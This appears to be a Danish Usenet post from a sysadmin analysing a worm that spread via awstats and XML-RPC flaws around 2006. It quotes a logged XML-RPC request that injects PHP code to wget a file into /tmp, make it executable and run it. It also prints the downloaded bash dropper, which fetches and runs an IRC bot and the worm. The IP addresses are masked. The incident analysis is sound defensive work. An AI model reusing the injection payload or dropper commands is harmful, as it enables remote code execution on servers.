Haps. Så fik jeg den langt om længe. Der er åbenbart en
auto-rooter/zombie der spreder sig via hhv. en fejl i awstats og
xmlrpc (fra et eller andet stykke blogware), så vidt jeg med mine
begrænsede kundskaber kan komme frem til.
Jeg ville normalt ikke interessere mig sønderligt for orm-du-jour,
men Giggle kender ikke noget til den her fætter, og så bliver man jo
nysgerrig.
Anyway, jeg startede med at konstatere et lidt særpræget POST til
xmlrpc.php i min log, konfigurerede lidt ekstra logging, og kunne så
konstatere at der åbenbart findes en mere eller mindre kendt sårbarhed
der i nogle situationer kan medføre afvikling af kode -- kaldet ser
således ud:
2006-01-09 10:53:17 Input: <?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_';echo `cd /tmp;wget 000.000.000.000/killos;chmod +x killos;./killos `;echo '_end_';exit;/*</name></value></param></params></methodCall>
.... hvor IP adressen (her udskiftet med 4x000) der hentes fra
selvfølgelig skifter fra zombie til zombie, og det gør navnet på det
script der hentes også.
De første par gange hvor jeg har forsøgt at snuppe en kopi af
scriptet til analyse, har det manglet eller den pågældende maskine
har ikke svaret. Men her til aften prøvede jeg så lige igen, og så
var der bid. Scriptet er en helt basic dropper:
$ cat killos
#!/bin/bash
wget 000.000.000.000/nikonhome
chmod 744 nikonhome
../nikonhome
wget 000.000.000.000/kis
chmod 755 kis
../kis
.... hvor nikonhome tilsyneladende er en IRC-client af en eller anden
art, og nikonhome er "selve" ormen (begge dele er konstateret ved
hjælp af strings(1)). Man kan selvfølgelig meget let forestille sig
at ogås 'kis' og 'nikonhome' bare er tilfældige navne der ændrer sig
fra installation til installation.
Det kommer nok ikke som nogen overraskelse at IRC-klienten
tilsyneladende forbinder til undernet for at finde sin botmaster.
Anyway. Jeg pakker den nok bare væk som et kuriosum, men hvis der er
et eller flere af gruppens faste bidragsydere der skulle have lyst til
at kigge nærmere på den, så sig endelig til.
--
Niels Callesøe - dk pfy @work
pfy[at]nntp.dk -
http://www.t29.dk/~nica/disclaimer.php
This space for rant.